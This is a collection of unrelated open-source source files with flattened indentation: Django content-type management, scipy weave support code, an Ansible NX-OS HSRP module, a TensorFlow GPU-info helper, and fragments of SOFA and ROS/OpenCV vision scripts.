SurfNode.createObject('Line')
SurfNode.createObject('Point')
SurfNode.createObject('BarycentricMapping')
return node
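# A minimal scene sketch showing how these helpers would typically be used from
# a SOFA scene file; createScene(rootNode) is the entry point SOFA looks for,
# and the names, positions and colors here are arbitrary examples.
def createScene(rootNode):
    createDragon(rootNode, 'dragon1', 0, 0, 0, 'red')
    createArmadillo(rootNode, 'armadillo1', 30, 0, 0, 'green')
    return rootNode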
| lgpl-2.1 |
alilotfi/django | django/contrib/contenttypes/management.py | 476 | 2521 | from django.apps import apps
from django.db import DEFAULT_DB_ALIAS, router
from django.utils import six
from django.utils.six.moves import input
def update_contenttypes(app_config, verbosity=2, interactive=True, using=DEFAULT_DB_ALIAS, **kwargs):
"""
Creates content types for models in the given app, removing any model
entries that no longer have a matching model class.
"""
if not app_config.models_module:
return
try:
ContentType = apps.get_model('contenttypes', 'ContentType')
except LookupError:
return
if not router.allow_migrate_model(using, ContentType):
return
ContentType.objects.clear_cache()
app_label = app_config.label
app_models = {
model._meta.model_name: model
for model in app_config.get_models()}
if not app_models:
return
# Get all the content types
content_types = {
ct.model: ct
for ct in ContentType.objects.using(using).filter(app_label=app_label)
}
to_remove = [
ct
for (model_name, ct) in six.iteritems(content_types)
if model_name not in app_models
]
cts = [
ContentType(
app_label=app_label,
model=model_name,
)
for (model_name, model) in six.iteritems(app_models)
if model_name not in content_types
]
ContentType.objects.using(using).bulk_create(cts)
if verbosity >= 2:
for ct in cts:
print("Adding content type '%s | %s'" % (ct.app_label, ct.model))
# Confirm that the content type is stale before deletion.
if to_remove:
if interactive:
content_type_display = '\n'.join(
' %s | %s' % (ct.app_label, ct.model)
for ct in to_remove
)
ok_to_delete = input("""The following content types are stale and need to be deleted:
%s
Any objects related to these content types by a foreign key will also
be deleted. Are you sure you want to delete these content types?
If you're unsure, answer 'no'.
Type 'yes' to continue, or 'no' to cancel: """ % content_type_display)
else:
ok_to_delete = False
if ok_to_delete == 'yes':
for ct in to_remove:
if verbosity >= 2:
print("Deleting stale content type '%s | %s'" % (ct.app_label, ct.model))
ct.delete()
else:
if verbosity >= 2:
print("Stale content types remain.")
| bsd-3-clause |
efiring/scipy | scipy/weave/common_info.py | 100 | 4254 | """ Generic support code for:
error handling code found in every weave module
local/global dictionary access code for inline() modules
swig pointer (old style) conversion support
"""
from __future__ import absolute_import, print_function
from . import base_info
module_support_code = \
"""
// global None value for use in functions.
namespace py {
object None = object(Py_None);
}
const char* find_type(PyObject* py_obj)
{
if(py_obj == NULL) return "C NULL value";
if(PyCallable_Check(py_obj)) return "callable";
if(PyString_Check(py_obj)) return "string";
if(PyInt_Check(py_obj)) return "int";
if(PyFloat_Check(py_obj)) return "float";
if(PyDict_Check(py_obj)) return "dict";
if(PyList_Check(py_obj)) return "list";
if(PyTuple_Check(py_obj)) return "tuple";
if(PyFile_Check(py_obj)) return "file";
if(PyModule_Check(py_obj)) return "module";
//should probably do more integration (and thinking) on these.
if(PyCallable_Check(py_obj) && PyInstance_Check(py_obj)) return "callable";
if(PyInstance_Check(py_obj)) return "instance";
if(PyCallable_Check(py_obj)) return "callable";
return "unknown type";
}
void throw_error(PyObject* exc, const char* msg)
{
//printf("setting python error: %s\\n",msg);
PyErr_SetString(exc, msg);
//printf("throwing error\\n");
throw 1;
}
void handle_bad_type(PyObject* py_obj, const char* good_type, const char* var_name)
{
char msg[500];
sprintf(msg,"received '%s' type instead of '%s' for variable '%s'",
find_type(py_obj),good_type,var_name);
throw_error(PyExc_TypeError,msg);
}
void handle_conversion_error(PyObject* py_obj, const char* good_type, const char* var_name)
{
char msg[500];
sprintf(msg,"Conversion Error:, received '%s' type instead of '%s' for variable '%s'",
find_type(py_obj),good_type,var_name);
throw_error(PyExc_TypeError,msg);
}
"""
#include "compile.h" /* Scary dangerous stuff */
#include "frameobject.h" /* Scary dangerous stuff */
class basic_module_info(base_info.base_info):
_headers = ['"Python.h"','"compile.h"','"frameobject.h"']
_support_code = [module_support_code]
#----------------------------------------------------------------------------
# inline() generated support code
#
# The following two function declarations handle access to variables in the
# global and local dictionaries for inline functions.
#----------------------------------------------------------------------------
get_variable_support_code = \
"""
void handle_variable_not_found(const char* var_name)
{
char msg[500];
sprintf(msg,"Conversion Error: variable '%s' not found in local or global scope.",var_name);
throw_error(PyExc_NameError,msg);
}
PyObject* get_variable(const char* name,PyObject* locals, PyObject* globals)
{
// no checking done for error -- locals and globals should
// already be validated as dictionaries. If var is NULL, the
// function calling this should handle it.
PyObject* var = NULL;
var = PyDict_GetItemString(locals,name);
if (!var)
{
var = PyDict_GetItemString(globals,name);
}
if (!var)
handle_variable_not_found(name);
return var;
}
"""
py_to_raw_dict_support_code = \
"""
PyObject* py_to_raw_dict(PyObject* py_obj, const char* name)
{
// simply check that the value is a valid dictionary pointer.
if(!py_obj || !PyDict_Check(py_obj))
handle_bad_type(py_obj, "dictionary", name);
return py_obj;
}
"""
class inline_info(base_info.base_info):
_support_code = [get_variable_support_code, py_to_raw_dict_support_code]
#----------------------------------------------------------------------------
# swig pointer support code
#
# The support code for swig is just slirped in from the swigptr.c file
# from the *old* swig distribution. The code from swigptr.c is now a string
# in swigptr.py to ease the process of incorporating it into py2exe
# installations. New style swig pointers are not yet supported.
#----------------------------------------------------------------------------
from . import swigptr
swig_support_code = swigptr.swigptr_code
class swig_info(base_info.base_info):
_support_code = [swig_support_code]
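# These *_info classes are not used directly; weave's code-generation machinery
# collects their _headers and _support_code and splices them into the generated
# extension module (e.g. inline() pulls in inline_info so the generated C++ can
# call get_variable() on the caller's locals/globals).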
| bsd-3-clause |
naslanidis/ansible | lib/ansible/modules/network/nxos/nxos_hsrp.py | 8 | 22899 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: nxos_hsrp
version_added: "2.2"
short_description: Manages HSRP configuration on NX-OS switches.
description:
- Manages HSRP configuration on NX-OS switches.
extends_documentation_fragment: nxos
author:
- Jason Edelman (@jedelman8)
- Gabriele Gerbino (@GGabriele)
notes:
- HSRP feature needs to be enabled first on the system.
- SVIs must exist before using this module.
- Interface must be a L3 port before using this module.
- HSRP cannot be configured on loopback interfaces.
- MD5 authentication is only possible with HSRPv2; it is silently ignored
(with no error raised) when HSRPv1 is used. Here we therefore allow MD5
authentication only with HSRPv2 in order to enforce better practice.
options:
group:
description:
- HSRP group number.
required: true
interface:
description:
- Full name of interface that is being managed for HSRP.
required: true
version:
description:
- HSRP version.
required: false
default: 2
choices: ['1','2']
priority:
description:
- HSRP priority.
required: false
default: null
vip:
description:
- HSRP virtual IP address.
required: false
default: null
auth_string:
description:
- Authentication string.
required: false
default: null
auth_type:
description:
- Authentication type.
required: false
default: null
choices: ['text','md5']
state:
description:
- Specify desired state of the resource.
required: false
choices: ['present','absent']
default: 'present'
'''
EXAMPLES = '''
- name: Ensure HSRP is configured with following params on a SVI
nxos_hsrp:
group: 10
vip: 10.1.1.1
priority: 150
interface: vlan10
preempt: enabled
host: 68.170.147.165
- name: Ensure HSRP is configured with following params on a SVI
nxos_hsrp:
group: 10
vip: 10.1.1.1
priority: 150
interface: vlan10
preempt: enabled
host: 68.170.147.165
auth_type: text
auth_string: CISCO
- name: Remove HSRP config for given interface, group, and VIP
nxos_hsrp:
group: 10
interface: vlan10
vip: 10.1.1.1
host: 68.170.147.165
state: absent
'''
RETURN = '''
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"group": "30", "version": "2", "vip": "10.30.1.1"}
existing:
description: k/v pairs of existing hsrp info on the interface
type: dict
sample: {}
end_state:
description: k/v pairs of hsrp after module execution
returned: always
type: dict
sample: {"auth_string": "cisco", "auth_type": "text",
"group": "30", "interface": "vlan10", "preempt": "disabled",
"priority": "100", "version": "2", "vip": "10.30.1.1"}
updates:
description: commands sent to the device
returned: always
type: list
sample: ["interface vlan10", "hsrp version 2", "hsrp 30", "ip 10.30.1.1"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
import json
# COMMON CODE FOR MIGRATION
import ansible.module_utils.nxos
from ansible.module_utils.basic import get_exception
from ansible.module_utils.netcfg import NetworkConfig, ConfigLine
from ansible.module_utils.shell import ShellError
from ansible.module_utils.network import NetworkModule
def to_list(val):
if isinstance(val, (list, tuple)):
return list(val)
elif val is not None:
return [val]
else:
return list()
class CustomNetworkConfig(NetworkConfig):
def expand_section(self, configobj, S=None):
if S is None:
S = list()
S.append(configobj)
for child in configobj.children:
if child in S:
continue
self.expand_section(child, S)
return S
def get_object(self, path):
for item in self.items:
if item.text == path[-1]:
parents = [p.text for p in item.parents]
if parents == path[:-1]:
return item
def to_block(self, section):
return '\n'.join([item.raw for item in section])
def get_section(self, path):
try:
section = self.get_section_objects(path)
return self.to_block(section)
except ValueError:
return list()
def get_section_objects(self, path):
if not isinstance(path, list):
path = [path]
obj = self.get_object(path)
if not obj:
raise ValueError('path does not exist in config')
return self.expand_section(obj)
def add(self, lines, parents=None):
"""Adds one or lines of configuration
"""
ancestors = list()
offset = 0
obj = None
## global config command
if not parents:
for line in to_list(lines):
item = ConfigLine(line)
item.raw = line
if item not in self.items:
self.items.append(item)
else:
for index, p in enumerate(parents):
try:
i = index + 1
obj = self.get_section_objects(parents[:i])[0]
ancestors.append(obj)
except ValueError:
# add parent to config
offset = index * self.indent
obj = ConfigLine(p)
obj.raw = p.rjust(len(p) + offset)
if ancestors:
obj.parents = list(ancestors)
ancestors[-1].children.append(obj)
self.items.append(obj)
ancestors.append(obj)
# add child objects
for line in to_list(lines):
# check if child already exists
for child in ancestors[-1].children:
if child.text == line:
break
else:
offset = len(parents) * self.indent
item = ConfigLine(line)
item.raw = line.rjust(len(line) + offset)
item.parents = ancestors
ancestors[-1].children.append(item)
self.items.append(item)
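# A small usage sketch for CustomNetworkConfig.add (hypothetical values, the
# same pattern the nxos modules use when building a candidate config):
#   candidate = CustomNetworkConfig(indent=2)
#   candidate.add(['ip 10.30.1.1'], parents=['interface vlan10', 'hsrp 30'])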
def get_network_module(**kwargs):
try:
return get_module(**kwargs)
except NameError:
return NetworkModule(**kwargs)
def get_config(module, include_defaults=False):
config = module.params['config']
if not config:
try:
config = module.get_config()
except AttributeError:
defaults = module.params['include_defaults']
config = module.config.get_config(include_defaults=defaults)
return CustomNetworkConfig(indent=2, contents=config)
def load_config(module, candidate):
config = get_config(module)
commands = candidate.difference(config)
commands = [str(c).strip() for c in commands]
save_config = module.params['save']
result = dict(changed=False)
if commands:
if not module.check_mode:
try:
module.configure(commands)
except AttributeError:
module.config(commands)
if save_config:
try:
module.config.save_config()
except AttributeError:
module.execute(['copy running-config startup-config'])
result['changed'] = True
result['updates'] = commands
return result
# END OF COMMON CODE
def execute_config_command(commands, module):
try:
output = module.configure(commands)
except ShellError:
clie = get_exception()
module.fail_json(msg='Error sending CLI commands',
error=str(clie), commands=commands)
except AttributeError:
try:
commands.insert(0, 'configure')
module.cli.add_commands(commands, output='config')
output = module.cli.run_commands()
except ShellError:
clie = get_exception()
module.fail_json(msg='Error sending CLI commands',
error=str(clie), commands=commands)
return output
def get_cli_body_ssh(command, response, module):
"""Get response for when transport=cli. This is kind of a hack and mainly
needed because these modules were originally written for NX-API. And
not every command supports "| json" when using cli/ssh. As such, we assume
if | json returns an XML string, it is a valid command, but that the
resource doesn't exist yet. Instead, the output will be a raw string
when issuing commands containing 'show run'.
"""
if 'xml' in response[0]:
body = []
elif 'show run' in command:
body = response
else:
try:
response = response[0].replace(command + '\n\n', '').strip()
body = [json.loads(response)]
except ValueError:
module.fail_json(msg='Command does not support JSON output',
command=command)
return body
def execute_show(cmds, module, command_type=None):
command_type_map = {
'cli_show': 'json',
'cli_show_ascii': 'text'
}
try:
if command_type:
response = module.execute(cmds, command_type=command_type)
else:
response = module.execute(cmds)
except ShellError:
clie = get_exception()
module.fail_json(msg='Error sending {0}'.format(cmds),
error=str(clie))
except AttributeError:
try:
if command_type:
command_type = command_type_map.get(command_type)
module.cli.add_commands(cmds, output=command_type)
response = module.cli.run_commands()
else:
module.cli.add_commands(cmds, raw=True)
response = module.cli.run_commands()
except ShellError:
clie = get_exception()
module.fail_json(msg='Error sending {0}'.format(cmds),
error=str(clie))
return response
def execute_show_command(command, module, command_type='cli_show'):
if module.params['transport'] == 'cli':
command += ' | json'
cmds = [command]
response = execute_show(cmds, module)
body = get_cli_body_ssh(command, response, module)
elif module.params['transport'] == 'nxapi':
cmds = [command]
body = execute_show(cmds, module, command_type=command_type)
return body
def apply_key_map(key_map, table):
new_dict = {}
for key, value in table.items():
new_key = key_map.get(key)
if new_key:
value = table.get(key)
if value:
new_dict[new_key] = str(value)
else:
new_dict[new_key] = value
return new_dict
def get_interface_type(interface):
if interface.upper().startswith('ET'):
return 'ethernet'
elif interface.upper().startswith('VL'):
return 'svi'
elif interface.upper().startswith('LO'):
return 'loopback'
elif interface.upper().startswith('MG'):
return 'management'
elif interface.upper().startswith('MA'):
return 'management'
elif interface.upper().startswith('PO'):
return 'portchannel'
else:
return 'unknown'
def get_interface_mode(interface, intf_type, module):
command = 'show interface {0}'.format(interface)
interface = {}
mode = 'unknown'
if intf_type in ['ethernet', 'portchannel']:
body = execute_show_command(command, module)[0]
interface_table = body['TABLE_interface']['ROW_interface']
mode = str(interface_table.get('eth_mode', 'layer3'))
if mode == 'access' or mode == 'trunk':
mode = 'layer2'
elif intf_type == 'svi':
mode = 'layer3'
return mode
def get_hsrp_groups_on_interfaces(device, module):
command = 'show hsrp all'
body = execute_show_command(command, module)
hsrp = {}
try:
get_data = body[0]['TABLE_grp_detail']['ROW_grp_detail']
except (KeyError, AttributeError):
return {}
for entry in get_data:
interface = str(entry['sh_if_index'].lower())
hsrp.setdefault(interface, [])
group = str(entry['sh_group_num'])
hsrp[interface].append(group)
return hsrp
def get_hsrp_group(group, interface, module):
command = 'show hsrp group {0}'.format(group)
body = execute_show_command(command, module)
hsrp = {}
hsrp_key = {
'sh_if_index': 'interface',
'sh_group_num': 'group',
'sh_group_version': 'version',
'sh_cfg_prio': 'priority',
'sh_preempt': 'preempt',
'sh_vip': 'vip',
'sh_authentication_type': 'auth_type',
'sh_authentication_data': 'auth_string'
}
try:
hsrp_table = body[0]['TABLE_grp_detail']['ROW_grp_detail']
except (AttributeError, IndexError, TypeError):
return {}
if isinstance(hsrp_table, dict):
hsrp_table = [hsrp_table]
for hsrp_group in hsrp_table:
parsed_hsrp = apply_key_map(hsrp_key, hsrp_group)
parsed_hsrp['interface'] = parsed_hsrp['interface'].lower()
if parsed_hsrp['version'] == 'v1':
parsed_hsrp['version'] = '1'
elif parsed_hsrp['version'] == 'v2':
parsed_hsrp['version'] = '2'
if parsed_hsrp['interface'] == interface:
return parsed_hsrp
return hsrp
def get_commands_remove_hsrp(group, interface):
commands = []
commands.append('interface {0}'.format(interface))
commands.append('no hsrp {0}'.format(group))
return commands
def get_commands_config_hsrp(delta, interface, args):
commands = []
config_args = {
'group': 'hsrp {group}',
'priority': 'priority {priority}',
'preempt': '{preempt}',
'vip': 'ip {vip}'
}
preempt = delta.get('preempt', None)
group = delta.get('group', None)
if preempt:
if preempt == 'enabled':
delta['preempt'] = 'preempt'
elif preempt == 'disabled':
delta['preempt'] = 'no preempt'
for key, value in delta.items():
command = config_args.get(key, 'DNE').format(**delta)
if command and command != 'DNE':
if key == 'group':
commands.insert(0, command)
else:
commands.append(command)
command = None
auth_type = delta.get('auth_type', None)
auth_string = delta.get('auth_string', None)
if auth_type or auth_string:
if not auth_type:
auth_type = args['auth_type']
elif not auth_string:
auth_string = args['auth_string']
if auth_type == 'md5':
command = 'authentication md5 key-string {0}'.format(auth_string)
commands.append(command)
elif auth_type == 'text':
command = 'authentication text {0}'.format(auth_string)
commands.append(command)
if commands and not group:
commands.insert(0, 'hsrp {0}'.format(args['group']))
version = delta.get('version', None)
if version:
if version == '2':
command = 'hsrp version 2'
elif version == '1':
command = 'hsrp version 1'
commands.insert(0, command)
commands.insert(0, 'interface {0}'.format(interface))
if commands:
if not commands[0].startswith('interface'):
commands.insert(0, 'interface {0}'.format(interface))
return commands
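# For delta={'group': '30', 'version': '2', 'vip': '10.30.1.1'} on vlan10 this
# yields, in order (matching the sample shown in RETURN above):
#   ['interface vlan10', 'hsrp version 2', 'hsrp 30', 'ip 10.30.1.1']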
def is_default(interface, module):
command = 'show run interface {0}'.format(interface)
try:
body = execute_show_command(command, module)[0]
if 'invalid' in body.lower():
return 'DNE'
else:
raw_list = body.split('\n')
if raw_list[-1].startswith('interface'):
return True
else:
return False
except (KeyError):
return 'DNE'
def validate_config(body, vip, module):
new_body = ''.join(body)
if "invalid ip address" in new_body.lower():
module.fail_json(msg="Invalid VIP. Possible duplicate IP address.",
vip=vip)
def validate_params(param, module):
value = module.params[param]
version = module.params['version']
if param == 'group':
try:
if (int(value) < 0 or int(value) > 255) and version == '1':
raise ValueError
elif int(value) < 0 or int(value) > 4095:
raise ValueError
except ValueError:
module.fail_json(msg="Warning! 'group' must be an integer between"
" 0 and 255 when version 1 and up to 4095 "
"when version 2.", group=value,
version=version)
elif param == 'priority':
try:
if (int(value) < 0 or int(value) > 255):
raise ValueError
except ValueError:
module.fail_json(msg="Warning! 'priority' must be an integer "
"between 0 and 255", priority=value)
def main():
argument_spec = dict(
group=dict(required=True, type='str'),
interface=dict(required=True),
version=dict(choices=['1', '2'], default='2', required=False),
priority=dict(type='str', required=False),
preempt=dict(type='str', choices=['disabled', 'enabled'],
required=False),
vip=dict(type='str', required=False),
auth_type=dict(choices=['text', 'md5'], required=False),
auth_string=dict(type='str', required=False),
state=dict(choices=['absent', 'present'], required=False,
default='present'),
include_defaults=dict(default=True),
config=dict(),
save=dict(type='bool', default=False)
)
module = get_network_module(argument_spec=argument_spec,
supports_check_mode=True)
interface = module.params['interface'].lower()
group = module.params['group']
version = module.params['version']
state = module.params['state']
priority = module.params['priority']
preempt = module.params['preempt']
vip = module.params['vip']
auth_type = module.params['auth_type']
auth_string = module.params['auth_string']
transport = module.params['transport']
if state == 'present' and not vip:
module.fail_json(msg='the "vip" param is required when state=present')
for param in ['group', 'priority']:
if module.params[param] is not None:
validate_params(param, module)
intf_type = get_interface_type(interface)
if (intf_type != 'ethernet' and transport == 'cli'):
if is_default(interface, module) == 'DNE':
module.fail_json(msg='That interface does not exist yet. Create '
'it first.', interface=interface)
if intf_type == 'loopback':
module.fail_json(msg="Loopback interfaces don't support HSRP.",
interface=interface)
mode = get_interface_mode(interface, intf_type, module)
if mode == 'layer2':
module.fail_json(msg='That interface is a layer2 port.\nMake it '
'a layer 3 port first.', interface=interface)
if auth_type or auth_string:
if not (auth_type and auth_string):
module.fail_json(msg='When using auth parameters, you need BOTH '
'auth_type AND auth_string.')
args = dict(group=group, version=version, priority=priority,
preempt=preempt, vip=vip, auth_type=auth_type,
auth_string=auth_string)
proposed = dict((k, v) for k, v in args.items() if v is not None)
existing = get_hsrp_group(group, interface, module)
# This will enforce better practice with md5 and hsrp version.
if proposed.get('auth_type', None) == 'md5':
if proposed['version'] == '1':
module.fail_json(msg="It's recommended to use HSRP v2 "
"when auth_type=md5")
elif not proposed.get('auth_type', None) and existing:
if (proposed['version'] == '1' and
existing['auth_type'] == 'md5'):
module.fail_json(msg="Existing auth_type is md5. It's recommended "
"to use HSRP v2 when using md5")
changed = False
end_state = existing
commands = []
if state == 'present':
delta = dict(
set(proposed.items()).difference(existing.items()))
if delta:
command = get_commands_config_hsrp(delta, interface, args)
commands.extend(command)
elif state == 'absent':
if existing:
command = get_commands_remove_hsrp(group, interface)
commands.extend(command)
if commands:
if module.check_mode:
module.exit_json(changed=True, commands=commands)
else:
body = execute_config_command(commands, module)
if transport == 'cli':
validate_config(body, vip, module)
changed = True
end_state = get_hsrp_group(group, interface, module)
if 'configure' in commands:
commands.pop(0)
results = {}
results['proposed'] = proposed
results['existing'] = existing
results['end_state'] = end_state
results['updates'] = commands
results['changed'] = changed
module.exit_json(**results)
if __name__ == '__main__':
main()
| gpl-3.0 |
tomasreimers/tensorflow-emscripten | tensorflow/tools/test/gpu_info_lib.py | 157 | 6340 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Library for getting system information during TensorFlow tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import ctypes as ct
import platform
from tensorflow.core.util import test_log_pb2
from tensorflow.python.framework import errors
from tensorflow.python.platform import gfile
def _gather_gpu_devices_proc():
"""Try to gather NVidia GPU device information via /proc/driver."""
dev_info = []
for f in gfile.Glob("/proc/driver/nvidia/gpus/*/information"):
bus_id = f.split("/")[5]
key_values = dict(line.rstrip().replace("\t", "").split(":", 1)
for line in gfile.GFile(f, "r"))
key_values = dict((k.lower(), v.strip(" ").rstrip(" "))
for (k, v) in key_values.items())
info = test_log_pb2.GPUInfo()
info.model = key_values.get("model", "Unknown")
info.uuid = key_values.get("gpu uuid", "Unknown")
info.bus_id = bus_id
dev_info.append(info)
return dev_info
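# Rough sketch of a /proc/driver/nvidia/gpus/*/information file that the
# parser above assumes; field names vary by driver version, so the lines
# below are illustrative only:
#
#   Model:           GeForce GTX 1080
#   IRQ:             129
#   GPU UUID:        GPU-8a56a4bc-0000-0000-0000-000000000000
#
# Each "Key:\tValue" line becomes one entry in the key_values dict.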
class CUDADeviceProperties(ct.Structure):
# See $CUDA_HOME/include/cuda_runtime_api.h for the definition of
# the cudaDeviceProp struct.
_fields_ = [
("name", ct.c_char * 256),
("totalGlobalMem", ct.c_size_t),
("sharedMemPerBlock", ct.c_size_t),
("regsPerBlock", ct.c_int),
("warpSize", ct.c_int),
("memPitch", ct.c_size_t),
("maxThreadsPerBlock", ct.c_int),
("maxThreadsDim", ct.c_int * 3),
("maxGridSize", ct.c_int * 3),
("clockRate", ct.c_int),
("totalConstMem", ct.c_size_t),
("major", ct.c_int),
("minor", ct.c_int),
("textureAlignment", ct.c_size_t),
("texturePitchAlignment", ct.c_size_t),
("deviceOverlap", ct.c_int),
("multiProcessorCount", ct.c_int),
("kernelExecTimeoutEnabled", ct.c_int),
("integrated", ct.c_int),
("canMapHostMemory", ct.c_int),
("computeMode", ct.c_int),
("maxTexture1D", ct.c_int),
("maxTexture1DMipmap", ct.c_int),
("maxTexture1DLinear", ct.c_int),
("maxTexture2D", ct.c_int * 2),
("maxTexture2DMipmap", ct.c_int * 2),
("maxTexture2DLinear", ct.c_int * 3),
("maxTexture2DGather", ct.c_int * 2),
("maxTexture3D", ct.c_int * 3),
("maxTexture3DAlt", ct.c_int * 3),
("maxTextureCubemap", ct.c_int),
("maxTexture1DLayered", ct.c_int * 2),
("maxTexture2DLayered", ct.c_int * 3),
("maxTextureCubemapLayered", ct.c_int * 2),
("maxSurface1D", ct.c_int),
("maxSurface2D", ct.c_int * 2),
("maxSurface3D", ct.c_int * 3),
("maxSurface1DLayered", ct.c_int * 2),
("maxSurface2DLayered", ct.c_int * 3),
("maxSurfaceCubemap", ct.c_int),
("maxSurfaceCubemapLayered", ct.c_int * 2),
("surfaceAlignment", ct.c_size_t),
("concurrentKernels", ct.c_int),
("ECCEnabled", ct.c_int),
("pciBusID", ct.c_int),
("pciDeviceID", ct.c_int),
("pciDomainID", ct.c_int),
("tccDriver", ct.c_int),
("asyncEngineCount", ct.c_int),
("unifiedAddressing", ct.c_int),
("memoryClockRate", ct.c_int),
("memoryBusWidth", ct.c_int),
("l2CacheSize", ct.c_int),
("maxThreadsPerMultiProcessor", ct.c_int),
("streamPrioritiesSupported", ct.c_int),
("globalL1CacheSupported", ct.c_int),
("localL1CacheSupported", ct.c_int),
("sharedMemPerMultiprocessor", ct.c_size_t),
("regsPerMultiprocessor", ct.c_int),
("managedMemSupported", ct.c_int),
("isMultiGpuBoard", ct.c_int),
("multiGpuBoardGroupID", ct.c_int),
# Pad with extra space to avoid dereference crashes if future
# versions of CUDA extend the size of this struct.
("__future_buffer", ct.c_char * 4096)
]
def _gather_gpu_devices_cudart():
"""Try to gather NVidia GPU device information via libcudart."""
dev_info = []
system = platform.system()
if system == "Linux":
libcudart = ct.cdll.LoadLibrary("libcudart.so")
elif system == "Darwin":
libcudart = ct.cdll.LoadLibrary("libcudart.dylib")
elif system == "Windows":
libcudart = ct.windll.LoadLibrary("libcudart.dll")
else:
raise NotImplementedError("Cannot identify system.")
version = ct.c_int()
rc = libcudart.cudaRuntimeGetVersion(ct.byref(version))
if rc != 0:
raise ValueError("Could not get version")
if version.value < 6050:
raise NotImplementedError("CUDA version must be between >= 6.5")
device_count = ct.c_int()
libcudart.cudaGetDeviceCount(ct.byref(device_count))
for i in range(device_count.value):
properties = CUDADeviceProperties()
rc = libcudart.cudaGetDeviceProperties(ct.byref(properties), i)
if rc != 0:
raise ValueError("Could not get device properties")
pci_bus_id = " " * 13
rc = libcudart.cudaDeviceGetPCIBusId(ct.c_char_p(pci_bus_id), 13, i)
if rc != 0:
raise ValueError("Could not get device PCI bus id")
info = test_log_pb2.GPUInfo() # No UUID available
info.model = properties.name
info.bus_id = pci_bus_id
dev_info.append(info)
del properties
return dev_info
def gather_gpu_devices():
"""Gather gpu device info.
Returns:
A list of test_log_pb2.GPUInfo messages.
"""
try:
# Prefer using /proc if possible, it provides the UUID.
dev_info = _gather_gpu_devices_proc()
if not dev_info:
raise ValueError("No devices found")
return dev_info
except (IOError, ValueError, errors.OpError):
pass
try:
# Fall back on using libcudart
return _gather_gpu_devices_cudart()
except (OSError, ValueError, NotImplementedError, errors.OpError):
return []
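# Usage sketch (yields an empty list on hosts without an NVidia GPU,
# since both gathering strategies then fail):
#
#   for gpu in gather_gpu_devices():
#       print(gpu.model, gpu.bus_id)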
| apache-2.0 |
smARTLab-liv/smartlabatwork-release | slaw_manipulation/src/detect_holes_rgb.py | 1 | 10677 | #!/usr/bin/env python
import rospy
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
# import thread
import cv
import cv2
import numpy as np
import tf
from math import sin, cos
import math
from slaw_msgs.msg import PoseStampedLabeled, PoseStampedLabeledArray
from j48 import j48_holes
import vision_constants
from vision_helpers import filter_contours, merge_contours, get_holes, pixel_to_m, \
get_darkest_hole, merge_contours_holes, find_m20_head, rotate_point, \
m_to_pixel # single_full2crop_coordinates
FULL_VISUALIZE = False
NO_VISUALIZATION = True
class DetectHolesRGB():
def __init__(self, training=False):
self.bridge = CvBridge()
self.cur_rgb = None
self.training = training
if not training:
# init camera
rospy.Subscriber("/camera/rgb/image_rect_color", Image, self.cb_rgb)
self.img_pub = rospy.Publisher("/vision/image_holes", Image)
self.pose_pub = rospy.Publisher("/vision/detected_holes", PoseStampedLabeledArray)
rate = rospy.Rate(30)
while not rospy.is_shutdown():
if self.cur_rgb is None:
rate.sleep()
continue
color = self.bridge.imgmsg_to_cv(self.cur_rgb, "bgr8")
color = np.array(color, dtype=np.uint8)
self.cur_rgb = None
self.cb_image(color)
rate.sleep()
def cb_rgb(self, msg):
self.cur_rgb = msg
def process_rgb(self, rgb_img):
frame_gray = cv2.cvtColor(rgb_img, cv.CV_RGB2GRAY)
# gray_blurred = cv2.GaussianBlur(frame_gray, (9, 9), 0)
gray_blurred = cv2.medianBlur(frame_gray, 5)
# gray_blurred = cv2.bilateralFilter(frame_gray, 8, 16, 4)
# cv2.imshow("gray_blurred", gray_blurred)
gray_filter = cv2.adaptiveThreshold(gray_blurred,
255.0,
# cv.CV_ADAPTIVE_THRESH_GAUSSIAN_C,
cv.CV_ADAPTIVE_THRESH_MEAN_C,
cv.CV_THRESH_BINARY,
9, # neighbourhood
9)
cv2.bitwise_not(gray_filter, gray_filter)
kernel = np.ones((3, 3), 'uint8')
# gray_erode = gray_filter
gray_erode = cv2.erode(gray_filter, kernel)
kernel2 = np.ones((5, 5), 'uint8')
gray_erode = cv2.dilate(gray_erode, kernel2)
gray_erode = cv2.erode(gray_erode, kernel)
size = rgb_img.shape
size = (size[1] - 1, size[0] - 1)
cv2.rectangle(gray_erode, (0, 0), size,
0, # color
20, # thickness
8, # lineType (8-connected line)
0) # shift (fractional bits in coordinates)
return gray_erode
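# The method above boils down to this standalone sketch (the input file
# name is a placeholder; kernel and block sizes mirror the values used):
#
#   img = cv2.imread('frame.png')
#   gray = cv2.medianBlur(cv2.cvtColor(img, cv.CV_RGB2GRAY), 5)
#   mask = cv2.adaptiveThreshold(gray, 255.0, cv.CV_ADAPTIVE_THRESH_MEAN_C,
#                                cv.CV_THRESH_BINARY, 9, 9)
#   cv2.bitwise_not(mask, mask)  # dark holes become white foreground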
def cb_image(self, color_frame):
try:
# # Crop image
color_frame = color_frame[vision_constants.crop_y[0]:vision_constants.crop_y[1],
vision_constants.crop_x[0]:vision_constants.crop_x[1]]
self.process_image(color_frame)
if not NO_VISUALIZATION:
cv.WaitKey(5)
except CvBridgeError, e:
print e
def process_image(self, color_img):
# make copys
color_img_display = color_img.copy()
